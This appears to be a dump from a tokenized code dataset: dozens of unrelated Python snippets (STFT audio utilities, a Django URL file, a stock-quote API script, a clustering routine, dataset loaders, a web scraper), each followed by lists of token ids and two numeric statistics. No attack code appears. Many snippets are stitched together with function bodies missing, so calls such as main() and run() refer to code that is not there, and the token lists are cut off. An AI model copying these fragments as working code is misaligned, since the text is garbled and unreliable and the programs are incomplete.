[ 4242, 2, 7575, 27782, 41798, 4242, 2235, 201, 198, 11748, 299, 32152, 355, 45941, 201, 198, 11748, 19798, 292, 355, 279, 67, 201, 198, 11748, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 201, 198, 6738, 4818, 8079, 1330, 28805, 1...
1.841399
1,715
import pytest import numpy as np from fanok.selection import adaptive_significance_threshold
[ 11748, 12972, 9288, 198, 198, 11748, 299, 32152, 355, 45941, 198, 198, 6738, 4336, 482, 13, 49283, 1330, 29605, 62, 12683, 811, 590, 62, 400, 10126, 628 ]
3.555556
27
#!/usr/bin/python # Copyright 2019 Christopher Schmidt # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer from urlparse import urlparse, parse_qs from jinja2 import Template import sqlite3 import urllib PORT_NUMBER = 8080 if __name__ == "__main__": print run()
[ 2, 48443, 14629, 14, 8800, 14, 29412, 198, 198, 2, 15069, 13130, 12803, 24740, 198, 2, 220, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198, 2, 345, 743, 407, 779, 428, 2393, 2845, ...
3.540426
235
from .main import Matrix
[ 6738, 764, 12417, 1330, 24936, 198 ]
4.166667
6
import os import sys import json import datetime import numpy as np import glob import skimage from PIL import Image as pil_image import cv2 import cv2 dataset_dir='/Volumes/v2/data/mlib_data/dataset/cmk/images_v2/' subset='val' load_cmk(dataset_dir=dataset_dir,subset=subset) locations=[(2,3,5,7),(8,8,9,9)] height=10 width=10 # mask,classIds=locationToMask(locations=locations,height=height,width=width) # print(mask) # print(classIds)
[ 628, 198, 198, 11748, 28686, 198, 11748, 25064, 198, 11748, 33918, 198, 11748, 4818, 8079, 198, 11748, 299, 32152, 355, 45941, 198, 198, 11748, 15095, 198, 11748, 1341, 9060, 198, 6738, 350, 4146, 1330, 7412, 355, 5560, 62, 9060, 198, 1...
2.352941
204
#!/usr/bin/env python3 # -*- coding: utf-8 -*- #Author:Winston.Wang import requests from bs4 import BeautifulSoup print(dir(BeautifulSoup)) url = 'http://www.baidu.com'; with requests.get(url) as r: r.encoding='utf-8' soup = BeautifulSoup(r.text) # pret = soup.prettify(); u = soup.select('#u1 a') for i in u: print("%s,:%s" % (i.getText(),i.get('href')))
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 2, 13838, 25, 16643, 3743, 13, 54, 648, 198, 11748, 7007, 198, 6738, 275, 82, 19, 1330, 23762, 50, 10486, 198, ...
2.240741
162
from django.urls import path, include from . import views urlpatterns = [ path("", views.newsView, name="home"), path("createBlog", views.CreateBlogView.as_view(), name="createBlog"), path("myBlogs", views.PostListView.as_view(), name="myBlogs"), path("single/<int:pk>", views.PostDetailView.as_view(), name="single"), path("subscribe", views.subscribeView,name="subscribe"), path("about", views.aboutView, name="about"), path("edit/<int:pk>", views.UpdateBlogView.as_view(), name="edit"), path("delete/<int:pk>", views.DeleteBlogView.as_view(), name="delete"), path("like/<int:pk>", views.LikeView, name="like_post"), # API urls for superuser path("api/create/", views.APICreateView.as_view()), path("api/posts/", views.APIListView.as_view()), path("api/posts/<int:pk>", views.APIDetailView.as_view()), ]
[ 6738, 42625, 14208, 13, 6371, 82, 1330, 3108, 11, 2291, 198, 6738, 764, 1330, 5009, 198, 198, 6371, 33279, 82, 796, 685, 198, 220, 220, 220, 3108, 7203, 1600, 5009, 13, 10827, 7680, 11, 1438, 2625, 11195, 12340, 198, 220, 220, 220, ...
2.563422
339
#!/usr/bin/python _author_ = "Matthew Zheng" _purpose_ = "Sets up the unit class"
[ 2, 48443, 14629, 14, 8800, 14, 29412, 198, 62, 9800, 62, 796, 366, 25372, 44583, 1, 198, 62, 29983, 62, 796, 366, 50, 1039, 510, 262, 4326, 1398, 1, 198 ]
2.733333
30
# -*- coding: utf-8 -*- """ Created on Wed Feb 26 22:23:07 2020 @author: Neal LONG Try to construct URL with string.format """ base_url = "http://quotes.money.163.com/service/gszl_{:>06}.html?type={}" stock = "000002" api_type = 'cp' print("http://quotes.money.163.com/service/gszl_"+stock+".html?type="+api_type) print(base_url.format(stock,api_type)) print('='*40) stock = "00002" print("http://quotes.money.163.com/service/gszl_"+stock+".html?type="+api_type) print(base_url.format(stock,api_type)) print('='*40) print('='*40) print('{:>6}'.format('236')) print('{:>06}'.format('236')) print("Every {} should know the use of {}-{} programming and {}" .format("programmer", "Open", "Source", "Operating Systems")) print("Every {3} should know the use of {2}-{1} programming and {0}" .format("programmer", "Open", "Source", "Operating Systems"))
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 201, 198, 37811, 201, 198, 41972, 319, 3300, 3158, 2608, 2534, 25, 1954, 25, 2998, 12131, 201, 198, 201, 198, 31, 9800, 25, 29189, 44533, 201, 198, 201, 198, 23433, 284, 56...
2.353846
390
from conans.server.launcher import ServerLauncher from conans.util.env_reader import get_env launcher = ServerLauncher(server_dir=get_env("CONAN_SERVER_HOME")) app = launcher.server.root_app if __name__ == "__main__": main()
[ 6738, 369, 504, 13, 15388, 13, 38722, 2044, 1330, 9652, 46182, 2044, 198, 198, 6738, 369, 504, 13, 22602, 13, 24330, 62, 46862, 1330, 651, 62, 24330, 198, 198, 38722, 2044, 796, 9652, 46182, 2044, 7, 15388, 62, 15908, 28, 1136, 62, ...
2.853659
82
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is regenerated. # -------------------------------------------------------------------------- from azure.core.exceptions import HttpResponseError import msrest.serialization
[ 2, 19617, 28, 40477, 12, 23, 198, 2, 16529, 35937, 198, 2, 15069, 357, 66, 8, 5413, 10501, 13, 1439, 2489, 10395, 13, 198, 2, 49962, 739, 262, 17168, 13789, 13, 4091, 13789, 13, 14116, 287, 262, 1628, 6808, 329, 5964, 1321, 13, 19...
4.233766
154
# # This module builds upon Cycles nodes work licensed as # Copyright 2011-2013 Blender Foundation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import math import bpy import os import arm.assets import arm.utils import arm.make_state import arm.log import arm.material.mat_state as mat_state import arm.material.cycles_functions as c_functions import shutil emission_found = False particle_info = None # Particle info export ## ## ##
[ 2, 198, 2, 770, 8265, 12188, 2402, 5934, 5427, 13760, 670, 11971, 355, 198, 2, 15069, 2813, 12, 6390, 1086, 2194, 5693, 198, 2, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198, 2, 3...
3.660156
256
import configparser import numpy as np import os if __name__ == "__main__": config = Config(print_warnings=True) # Check if any added items miss templates for k in config.items: if not os.path.exists(f"./assets/items/{k}.png"): print(f"Template not found: {k}") # Check if any item templates miss a config for filename in os.listdir(f'assets/items'): filename = filename.lower() if filename.endswith('.png'): item_name = filename[:-4] blacklist_item = item_name.startswith("bl__") if item_name not in config.items and not blacklist_item: print(f"Config not found for: " + filename)
[ 11748, 4566, 48610, 201, 198, 11748, 299, 32152, 355, 45941, 201, 198, 11748, 28686, 201, 198, 201, 198, 201, 198, 201, 198, 361, 11593, 3672, 834, 6624, 366, 834, 12417, 834, 1298, 201, 198, 220, 220, 220, 4566, 796, 17056, 7, 4798, ...
2.298077
312
# Copyright 2019 Jian Wu # License: Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0) import math import numpy as np import torch as th import torch.nn as nn import torch.nn.functional as tf import librosa.filters as filters from aps.const import EPSILON from typing import Optional, Union, Tuple def init_window(wnd: str, frame_len: int) -> th.Tensor: """ Return window coefficient Args: wnd: window name frame_len: length of the frame """ if wnd not in ["bartlett", "hann", "hamm", "blackman", "rect", "sqrthann"]: raise RuntimeError(f"Unknown window type: {wnd}") wnd_tpl = { "sqrthann": sqrthann, "hann": th.hann_window, "hamm": th.hamming_window, "blackman": th.blackman_window, "bartlett": th.bartlett_window, "rect": th.ones } if wnd != "rect": # match with librosa c = wnd_tpl[wnd](frame_len, periodic=True) else: c = wnd_tpl[wnd](frame_len) return c def init_kernel(frame_len: int, frame_hop: int, window: str, round_pow_of_two: bool = True, normalized: bool = False, inverse: bool = False, mode: str = "librosa") -> th.Tensor: """ Return STFT kernels Args: frame_len: length of the frame frame_hop: hop size between frames window: window name round_pow_of_two: if true, choose round(#power_of_two) as the FFT size normalized: return normalized DFT matrix inverse: return iDFT matrix mode: framing mode (librosa or kaldi) """ if mode not in ["librosa", "kaldi"]: raise ValueError(f"Unsupported mode: {mode}") # FFT points B = 2**math.ceil(math.log2(frame_len)) if round_pow_of_two else frame_len # center padding window if needed if mode == "librosa" and B != frame_len: lpad = (B - frame_len) // 2 window = tf.pad(window, (lpad, B - frame_len - lpad)) if normalized: # make K^H * K = I S = B**0.5 else: S = 1 I = th.stack([th.eye(B), th.zeros(B, B)], dim=-1) # W x B x 2 K = th.fft(I / S, 1) if mode == "kaldi": K = K[:frame_len] if inverse and not normalized: # to make K^H * K = I K = K / B # 2 x B x W K = th.transpose(K, 0, 2) * window # 2B x 1 x W K = th.reshape(K, (B * 2, 1, K.shape[-1])) return K, window def mel_filter(frame_len: int, round_pow_of_two: bool = True, num_bins: Optional[int] = None, sr: int = 16000, num_mels: int = 80, fmin: float = 0.0, fmax: Optional[float] = None, norm: bool = False) -> th.Tensor: """ Return mel filter coefficients Args: frame_len: length of the frame round_pow_of_two: if true, choose round(#power_of_two) as the FFT size num_bins: number of the frequency bins produced by STFT num_mels: number of the mel bands fmin: lowest frequency (in Hz) fmax: highest frequency (in Hz) norm: normalize the mel filter coefficients """ # FFT points if num_bins is None: N = 2**math.ceil( math.log2(frame_len)) if round_pow_of_two else frame_len else: N = (num_bins - 1) * 2 # fmin & fmax freq_upper = sr // 2 if fmax is None: fmax = freq_upper else: fmax = min(fmax + freq_upper if fmax < 0 else fmax, freq_upper) fmin = max(0, fmin) # mel filter coefficients mel = filters.mel(sr, N, n_mels=num_mels, fmax=fmax, fmin=fmin, htk=True, norm="slaney" if norm else None) # num_mels x (N // 2 + 1) return th.tensor(mel, dtype=th.float32) def speed_perturb_filter(src_sr: int, dst_sr: int, cutoff_ratio: float = 0.95, num_zeros: int = 64) -> th.Tensor: """ Return speed perturb filters, reference: https://github.com/danpovey/filtering/blob/master/lilfilter/resampler.py Args: src_sr: sample rate of the source signal dst_sr: sample rate of the target signal Return: weight (Tensor): coefficients of the filter """ if src_sr == dst_sr: raise ValueError( f"src_sr should not be equal to dst_sr: {src_sr}/{dst_sr}") gcd = math.gcd(src_sr, dst_sr) src_sr = src_sr // gcd dst_sr = dst_sr // gcd if src_sr == 1 or dst_sr == 1: raise ValueError("do not support integer downsample/upsample") zeros_per_block = min(src_sr, dst_sr) * cutoff_ratio padding = 1 + int(num_zeros / zeros_per_block) # dst_sr x src_sr x K times = (np.arange(dst_sr)[:, None, None] / float(dst_sr) - np.arange(src_sr)[None, :, None] / float(src_sr) - np.arange(2 * padding + 1)[None, None, :] + padding) window = np.heaviside(1 - np.abs(times / padding), 0.0) * (0.5 + 0.5 * np.cos(times / padding * math.pi)) weight = np.sinc( times * zeros_per_block) * window * zeros_per_block / float(src_sr) return th.tensor(weight, dtype=th.float32) def splice_feature(feats: th.Tensor, lctx: int = 1, rctx: int = 1, subsampling_factor: int = 1, op: str = "cat") -> th.Tensor: """ Splice feature Args: feats (Tensor): N x ... x T x F, original feature lctx: left context rctx: right context subsampling_factor: subsampling factor op: operator on feature context Return: splice (Tensor): feature with context padded """ if lctx + rctx == 0: return feats if op not in ["cat", "stack"]: raise ValueError(f"Unknown op for feature splicing: {op}") # [N x ... x T x F, ...] ctx = [] T = feats.shape[-2] T = T - T % subsampling_factor for c in range(-lctx, rctx + 1): idx = th.arange(c, c + T, device=feats.device, dtype=th.int64) idx = th.clamp(idx, min=0, max=T - 1) ctx.append(th.index_select(feats, -2, idx)) if op == "cat": # N x ... x T x FD splice = th.cat(ctx, -1) else: # N x ... x T x F x D splice = th.stack(ctx, -1) return splice def _forward_stft( wav: th.Tensor, kernel: th.Tensor, output: str = "polar", pre_emphasis: float = 0, frame_hop: int = 256, onesided: bool = False, center: bool = False) -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]: """ STFT inner function Args: wav (Tensor), N x (C) x S kernel (Tensor), STFT transform kernels, from init_kernel(...) output (str), output format: polar: return (magnitude, phase) pair complex: return (real, imag) pair real: return [real; imag] Tensor frame_hop: frame hop size in number samples pre_emphasis: factor of preemphasis onesided: return half FFT bins center: if true, we assumed to have centered frames Return: transform (Tensor or [Tensor, Tensor]), STFT transform results """ wav_dim = wav.dim() if output not in ["polar", "complex", "real"]: raise ValueError(f"Unknown output format: {output}") if wav_dim not in [2, 3]: raise RuntimeError(f"STFT expect 2D/3D tensor, but got {wav_dim:d}D") # if N x S, reshape N x 1 x S # else: reshape NC x 1 x S N, S = wav.shape[0], wav.shape[-1] wav = wav.view(-1, 1, S) # NC x 1 x S+2P if center: pad = kernel.shape[-1] // 2 # NOTE: match with librosa wav = tf.pad(wav, (pad, pad), mode="reflect") # STFT if pre_emphasis > 0: # NC x W x T frames = tf.unfold(wav[:, None], (1, kernel.shape[-1]), stride=frame_hop, padding=0) frames[:, 1:] = frames[:, 1:] - pre_emphasis * frames[:, :-1] # 1 x 2B x W, NC x W x T, NC x 2B x T packed = th.matmul(kernel[:, 0][None, ...], frames) else: packed = tf.conv1d(wav, kernel, stride=frame_hop, padding=0) # NC x 2B x T => N x C x 2B x T if wav_dim == 3: packed = packed.view(N, -1, packed.shape[-2], packed.shape[-1]) # N x (C) x B x T real, imag = th.chunk(packed, 2, dim=-2) # N x (C) x B/2+1 x T if onesided: num_bins = kernel.shape[0] // 4 + 1 real = real[..., :num_bins, :] imag = imag[..., :num_bins, :] if output == "complex": return (real, imag) elif output == "real": return th.stack([real, imag], dim=-1) else: mag = (real**2 + imag**2 + EPSILON)**0.5 pha = th.atan2(imag, real) return (mag, pha) def _inverse_stft(transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]], kernel: th.Tensor, window: th.Tensor, input: str = "polar", frame_hop: int = 256, onesided: bool = False, center: bool = False) -> th.Tensor: """ iSTFT inner function Args: transform (Tensor or [Tensor, Tensor]), STFT transform results kernel (Tensor), STFT transform kernels, from init_kernel(...) input (str), input format: polar: return (magnitude, phase) pair complex: return (real, imag) pair real: return [real; imag] Tensor frame_hop: frame hop size in number samples onesided: return half FFT bins center: used in _forward_stft Return: wav (Tensor), N x S """ if input not in ["polar", "complex", "real"]: raise ValueError(f"Unknown output format: {input}") if input == "real": real, imag = transform[..., 0], transform[..., 1] elif input == "polar": real = transform[0] * th.cos(transform[1]) imag = transform[0] * th.sin(transform[1]) else: real, imag = transform # (N) x F x T imag_dim = imag.dim() if imag_dim not in [2, 3]: raise RuntimeError(f"Expect 2D/3D tensor, but got {imag_dim}D") # if F x T, reshape 1 x F x T if imag_dim == 2: real = th.unsqueeze(real, 0) imag = th.unsqueeze(imag, 0) if onesided: # [self.num_bins - 2, ..., 1] reverse = range(kernel.shape[0] // 4 - 1, 0, -1) # extend matrix: N x B x T real = th.cat([real, real[:, reverse]], 1) imag = th.cat([imag, -imag[:, reverse]], 1) # pack: N x 2B x T packed = th.cat([real, imag], dim=1) # N x 1 x T s = tf.conv_transpose1d(packed, kernel, stride=frame_hop, padding=0) # normalized audio samples # refer: https://github.com/pytorch/audio/blob/2ebbbf511fb1e6c47b59fd32ad7e66023fa0dff1/torchaudio/functional.py#L171 # 1 x W x T win = th.repeat_interleave(window[None, ..., None], packed.shape[-1], dim=-1) # W x 1 x W I = th.eye(window.shape[0], device=win.device)[:, None] # 1 x 1 x T norm = tf.conv_transpose1d(win**2, I, stride=frame_hop, padding=0) if center: pad = kernel.shape[-1] // 2 s = s[..., pad:-pad] norm = norm[..., pad:-pad] s = s / (norm + EPSILON) # N x S s = s.squeeze(1) return s def forward_stft( wav: th.Tensor, frame_len: int, frame_hop: int, output: str = "complex", window: str = "sqrthann", round_pow_of_two: bool = True, pre_emphasis: float = 0, normalized: bool = False, onesided: bool = True, center: bool = False, mode: str = "librosa") -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]: """ STFT function implementation, equals to STFT layer Args: wav: source audio signal frame_len: length of the frame frame_hop: hop size between frames output: output type (complex, real, polar) window: window name center: center flag (similar with that in librosa.stft) round_pow_of_two: if true, choose round(#power_of_two) as the FFT size pre_emphasis: factor of preemphasis normalized: use normalized DFT kernel onesided: output onesided STFT inverse: using iDFT kernel (for iSTFT) mode: "kaldi"|"librosa", slight difference on applying window function """ K, _ = init_kernel(frame_len, frame_hop, init_window(window, frame_len), round_pow_of_two=round_pow_of_two, normalized=normalized, inverse=False, mode=mode) return _forward_stft(wav, K.to(wav.device), output=output, frame_hop=frame_hop, pre_emphasis=pre_emphasis, onesided=onesided, center=center) def inverse_stft(transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]], frame_len: int, frame_hop: int, input: str = "complex", window: str = "sqrthann", round_pow_of_two: bool = True, normalized: bool = False, onesided: bool = True, center: bool = False, mode: str = "librosa") -> th.Tensor: """ iSTFT function implementation, equals to iSTFT layer Args: transform: results of STFT frame_len: length of the frame frame_hop: hop size between frames input: input format (complex, real, polar) window: window name center: center flag (similar with that in librosa.stft) round_pow_of_two: if true, choose round(#power_of_two) as the FFT size normalized: use normalized DFT kernel onesided: output onesided STFT mode: "kaldi"|"librosa", slight difference on applying window function """ if isinstance(transform, th.Tensor): device = transform.device else: device = transform[0].device K, w = init_kernel(frame_len, frame_hop, init_window(window, frame_len), round_pow_of_two=round_pow_of_two, normalized=normalized, inverse=True, mode=mode) return _inverse_stft(transform, K.to(device), w.to(device), input=input, frame_hop=frame_hop, onesided=onesided, center=center)
[ 2, 15069, 13130, 40922, 18027, 198, 2, 13789, 25, 24843, 362, 13, 15, 357, 4023, 1378, 2503, 13, 43073, 13, 2398, 14, 677, 4541, 14, 43, 2149, 24290, 12, 17, 13, 15, 8, 198, 198, 11748, 10688, 198, 198, 11748, 299, 32152, 355, 459...
1.998003
7,510
# Copyright 2019 Graphcore Ltd. from models.resnet_base import ResNet import tensorflow.compat.v1 as tf import tensorflow.contrib as contrib from tensorflow.python.ipu import normalization_ops # This is all written for: NHWC
[ 2, 15069, 13130, 29681, 7295, 12052, 13, 198, 6738, 4981, 13, 411, 3262, 62, 8692, 1330, 1874, 7934, 198, 198, 11748, 11192, 273, 11125, 13, 5589, 265, 13, 85, 16, 355, 48700, 198, 11748, 11192, 273, 11125, 13, 3642, 822, 355, 542, ...
3.257143
70
# Generated by Django 3.1.4 on 2020-12-05 18:46 from django.db import migrations, models
[ 2, 2980, 515, 416, 37770, 513, 13, 16, 13, 19, 319, 12131, 12, 1065, 12, 2713, 1248, 25, 3510, 198, 198, 6738, 42625, 14208, 13, 9945, 1330, 15720, 602, 11, 4981, 628 ]
2.84375
32
#!/usr/bin/env python3 import time import os import tempfile import shutil import logging from enum import Enum from argparse import ArgumentParser, Namespace, FileType from netCDF4 import Dataset, MFDataset import geopandas as gpd import numpy as np domain_nodes_shp = "gis/ssm domain nodes.shp" masked_nodes_txt = "gis/masked nodes.txt" logger = logging.getLogger(__name__) DEFAULT_SIGLAYERS = [-0.01581139, -0.06053274, -0.12687974, -0.20864949, -0.30326778, -0.40915567, -0.52520996, -0.65060186, -0.78467834, -0.9269075 ] # Gotten from https://stackoverflow.com/questions/312443/how-do-you-split-a-list-or-iterable-into-evenly-sized-chunks attr_strings = { "all": InputAttr.ALL, "bottom": InputAttr.BOTTOM } # Expands an input variable argument into a variable name and an attribute # describing the vertical extraction method. if __name__ == "__main__": main()
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 198, 11748, 640, 198, 11748, 28686, 198, 11748, 20218, 7753, 198, 11748, 4423, 346, 198, 11748, 18931, 198, 6738, 33829, 1330, 2039, 388, 198, 6738, 1822, 29572, 1330, 45751, 46677, ...
2.457219
374
from logging import getLogger from libcity.executor.abstract_tradition_executor import AbstractTraditionExecutor from libcity.utils import get_evaluator
[ 6738, 18931, 1330, 651, 11187, 1362, 198, 6738, 9195, 19205, 13, 18558, 38409, 13, 397, 8709, 62, 2213, 324, 653, 62, 18558, 38409, 1330, 27741, 2898, 324, 653, 23002, 38409, 198, 6738, 9195, 19205, 13, 26791, 1330, 651, 62, 18206, 84, ...
3.581395
43
# Generated by Django 2.2.5 on 2020-04-08 00:08 from django.db import migrations
[ 2, 2980, 515, 416, 37770, 362, 13, 17, 13, 20, 319, 12131, 12, 3023, 12, 2919, 3571, 25, 2919, 198, 198, 6738, 42625, 14208, 13, 9945, 1330, 15720, 602, 628 ]
2.766667
30
# API # 2 BlockRequest Request # API 2 # # BlockRequest - # Request Received # # 2 # BlockRequest # , BlockRequest # # Request . import pythoncom from PyQt5.QtWidgets import * import win32com.client import win32event g_objCodeMgr = win32com.client.Dispatch('CpUtil.CpCodeMgr') StopEvent = win32event.CreateEvent(None, 0, 0, None) def MessagePump(timeout): waitables = [StopEvent] while 1: rc = win32event.MsgWaitForMultipleObjects( waitables, 0, # Wait for all = false, so it waits for anyone timeout, # (or win32event.INFINITE) win32event.QS_ALLEVENTS) # Accepts all input if rc == win32event.WAIT_OBJECT_0: # Our first event listed, the StopEvent, was triggered, so we must exit print('stop event') break elif rc == win32event.WAIT_OBJECT_0 + len(waitables): # A windows message is waiting - take care of it. (Don't ask me # why a WAIT_OBJECT_MSG isn't defined < WAIT_OBJECT_0...!). # This message-serving MUST be done for COM, DDE, and other # Windowsy things to work properly! print('pump') if pythoncom.PumpWaitingMessages(): break # we received a wm_quit message elif rc == win32event.WAIT_TIMEOUT: print('timeout') return pass else: print('exception') raise RuntimeError("unexpected win32wait return value") code = 'A005930' ############################################################## # 1. BlockRequest print('#####################################') objStockMst = win32com.client.Dispatch("DsCbo1.StockMst") objStockMst.SetInputValue(0, code) objStockMst.BlockRequest() print('BlockRequest ') item = {} item[''] = g_objCodeMgr.CodeToName(code) item[''] = objStockMst.GetHeaderValue(11) # item[''] = objStockMst.GetHeaderValue(12) # print(item) print('') ############################################################## # 2. Request ==> ==> OnReceived print('#####################################') objReply = CpCurReply(objStockMst) objReply.Subscribe() code = 'A005930' objStockMst.SetInputValue(0, code) objStockMst.Request() MessagePump(10000) item = {} item[''] = g_objCodeMgr.CodeToName(code) item[''] = objStockMst.GetHeaderValue(11) # item[''] = objStockMst.GetHeaderValue(12) # print(item)
[ 2, 220, 7824, 201, 198, 2, 220, 220, 220, 362, 9726, 18453, 220, 19390, 220, 220, 220, 201, 198, 2, 220, 7824, 220, 220, 220, 220, 220, 362, 220, 201, 198, 2, 201, 198, 2, 9726, 18453, 220, 532, 220, 220, 220, 220, 220, 220, 2...
2.210213
1,175
#%% import numpy as np import copy import matplotlib.pyplot as plt import time def split_cluster_new(tree,local_density,dc_eps,closest_denser_nodes_id,mixin_near_matrix): ''' dc_eps: density_connectivity outlier outlier_forest cluster_forest ''' mean_density = np.mean(local_density) outlier_forest = {} cluster_forest = {} uncertain_forest = {} not_direct_reach = [] #* for k in range(len(closest_denser_nodes_id)): near_nodes = mixin_near_matrix[k] if closest_denser_nodes_id[k] not in near_nodes: not_direct_reach.append(k) pass not_direct_reach = np.array(not_direct_reach) # not_direct_reach = np.where(closest_dis_denser>eps)[0] #* # not_direct_reach = np.array(not_direct_reach) depth_list_not_direct_reach= np.zeros(len(not_direct_reach),dtype=np.int16) for i in range(len(not_direct_reach)): # depth_list_not_direct_reach[i] = tree.node_dir[not_direct_reach[i]].getLvl() depth_list_not_direct_reach[i] = tree.calcu_depth(not_direct_reach[i],0) pass not_direct_reach = list(not_direct_reach[np.argsort(depth_list_not_direct_reach)]) #* start = time.clock() while(len(not_direct_reach)>0): #* node_id = not_direct_reach.pop() if(node_id==129193 or node_id==61589 or node_id == 123593): print(node_id) if node_id in tree.sorted_gamma_index[0:10]: cluster_forest[node_id] = tree.remove_subtree(node_id) continue node = tree.node_dir[node_id] parent_id = node.parent_id parent_node = tree.node_dir[parent_id] children = parent_node.getChildren() siblings_reliable = [ i for i in children if i not in not_direct_reach] #* not_reliable_nodes = [i for i in children if i not in siblings_reliable] if node_id in not_reliable_nodes: not_reliable_nodes.remove(node_id) if node_id in siblings_reliable: siblings_reliable.remove(node_id) pairs_nodes = is_connected_new(tree,local_density,dc_eps,node_id,siblings_reliable,not_reliable_nodes,mixin_near_matrix) if len(pairs_nodes)==0: if(node_id==tree.root_node.node_id): continue if(local_density[node_id]-mean_density*dc_eps)>=0: #* : offspring_id = tree.get_subtree_offspring_id(node_id,[node_id]) if(len(offspring_id)<local_density[node_id]): uncertain_forest[node_id] = tree.remove_subtree(node_id) pass else: cluster_forest[node_id] = tree.remove_subtree(node_id) pass pass else: outlier_forest[node_id] = tree.remove_subtree(node_id) pass pass pass end = time.clock() print(' %s' % str(end - start)) cluster_forest[tree.root_node.node_id] = tree #* return outlier_forest, cluster_forest, uncertain_forest def is_connected_new(tree,local_density,dc_eps,cur_node_id,reliable_nodes,not_reliable_nodes,mixin_near_matrix): ''' cur_node: reliable_nodes not_reliable_nodes 1. cur_node reliable_nodes 2 2. cur_node not_reliable_nodes([a,b,c,d,e]) [a,b,c][d,e]3 3. [a,b,c], is_connected_entropy(,cur_node_id=[a],reliable_nodes,not_reliable_nodes=[b,c,d,e]) ''' #* 1. if(len(reliable_nodes)==0): return [] for reliable_node_id in reliable_nodes: pairs_nodes, connected_nodes = tree.calcu_neighbor_btw_subtree(cur_node_id,reliable_node_id,mixin_near_matrix) if(len(pairs_nodes)==0): continue # return pairs_nodes cur_node_offspring = tree.get_subtree_offspring_id(cur_node_id,[cur_node_id]) local_density_cur_offspring = np.mean(local_density[cur_node_offspring]) local_density_connected_nodes = np.mean(local_density[connected_nodes]) if(local_density_connected_nodes>local_density_cur_offspring*dc_eps): return pairs_nodes pass #* 2. for i in range(len(not_reliable_nodes)): pairs_nodes, connected_nodes = tree.calcu_neighbor_btw_subtree(cur_node_id,not_reliable_nodes[i],mixin_near_matrix) if(len(pairs_nodes)==0): pairs_nodes = is_connected_new(tree,local_density,dc_eps,not_reliable_nodes[i],reliable_nodes,not_reliable_nodes[i+1:],mixin_near_matrix) if(len(pairs_nodes)>0): return pairs_nodes else: cur_node_offspring = tree.get_subtree_offspring_id(cur_node_id,[cur_node_id]) local_density_cur_offspring = np.mean(local_density[cur_node_offspring]) local_density_connected_nodes = np.mean(local_density[connected_nodes]) if(local_density_connected_nodes>local_density_cur_offspring*dc_eps): return pairs_nodes # return pairs_nodes # #* cur_node_offspring = tree.get_subtree_offspring_id(cur_node_id,[cur_node_id]) local_density_cur_offspring = np.mean(local_density[cur_node_offspring]) local_density_connected_nodes = np.mean(local_density[connected_nodes]) if(local_density_connected_nodes>local_density_cur_offspring*dc_eps): return pairs_nodes if(len(pairs_nodes)==0): pairs_nodes = is_connected_new(tree,local_density,dc_eps,not_reliable_nodes[i],reliable_nodes,not_reliable_nodes[i+1:],mixin_near_matrix) if(len(pairs_nodes)>0): return pairs_nodes # pass return [] def label_these_node_new(outlier_forest,cluster_forest,node_num,uncertain_forest,mixin_near_matrix): ''' ''' labels = np.full((node_num),-1,dtype=np.int32) for outlier_id in outlier_forest: outlier_tree = outlier_forest[outlier_id] outlier_idlist = outlier_tree.get_subtree_offspring_id(outlier_id,[outlier_id]) labels[outlier_idlist] = -1 pass label = 0 for tree_id in cluster_forest: cluster_tree = cluster_forest[tree_id] cluster_idlist = cluster_tree.get_subtree_offspring_id(tree_id,[tree_id]) labels[cluster_idlist] = label label = label + 1 pass #todo for uncertain_tree_id in uncertain_forest: uncertain_tree = uncertain_forest[uncertain_tree_id] uncertain_nodes_id = uncertain_tree.get_subtree_offspring_id(uncertain_tree_id,[uncertain_tree_id]) all_near_nodes = np.array([],dtype=np.int32) for node_id in uncertain_nodes_id: all_near_nodes = np.append(all_near_nodes,mixin_near_matrix[node_id]) pass # all_near_nodes = mixin_near_matrix[uncertain_nodes_id] all_near_nodes = np.unique(all_near_nodes) all_near_nodes = all_near_nodes[np.where(labels[all_near_nodes]!=-1)] unique_labels,counts=np.unique(labels[all_near_nodes],return_counts=True) if(len(counts)==0): cur_label = -1 else: cur_label = unique_labels[np.argmax(counts)] labels[uncertain_nodes_id]=cur_label pass core_points = cluster_forest.keys() return labels,core_points ''' cfsfdp DPTree '''
[ 2, 16626, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 4866, 198, 11748, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 198, 11748, 640, 220, 198, 198, 4299, 6626, 62, 565, 5819, 62, 3605, 7, 21048, 11, 12001, 62, 43337, 11, 1...
2.034141
3,632
from __future__ import print_function import sys sys.path.append('.') import os from typing import Optional, Union import cv2 import numpy as np import PIL.Image as Image import pickle import torch from torch.utils import data __all__ = ["TAO"]
